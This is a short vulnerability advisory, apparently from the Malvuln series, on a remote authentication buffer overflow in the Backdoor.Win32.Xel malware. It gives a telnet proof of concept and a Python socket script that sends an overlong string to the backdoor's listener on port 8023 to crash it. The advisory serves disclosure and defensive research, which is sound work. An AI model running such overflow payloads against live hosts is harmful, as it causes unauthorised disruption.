Backdoor.Win32.Xel Remote Authentication Buffer Overflow
Backdoor.Win32.Xel malware suffers from a remote authentication-related buffer overflow vulnerability.
Exploit/PoC-1:
| TELNET x.x.x.x 8023
Enter a long string for password.
|
Exploit/PoC-2:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| from socket import *
MALWARE_HOST="x.x.x.x"
PORT=8023
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PBARBAR="A"*200+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PBARBAR)
s.close()
print("Backdoor.Win32.Xel / Remote Authentication Buffer Overflow")
print("MD5: 3648c68bfe395fb9980ae547d881572c")
print("By Malvuln");
if __name__=="__main__":
doit()
|